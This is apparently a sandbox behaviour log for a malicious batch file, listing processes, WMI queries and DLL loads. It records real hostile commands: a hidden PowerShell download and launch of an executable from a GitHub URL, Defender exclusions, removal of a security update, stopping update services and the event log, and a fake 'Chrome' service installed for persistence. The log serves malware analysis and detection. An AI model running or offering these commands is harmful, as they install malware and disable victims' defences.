Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1348.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\ProgramData\Chrome.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: eshkere.bat

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe"
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Chrome"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Chrome"
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\ProgramData\Chrome.exe C:\ProgramData\Chrome.exe
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\1348.exe "C:\Users\user\AppData\Local\Temp\1348.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "Chrome"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "Chrome"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1348.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\Chrome.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
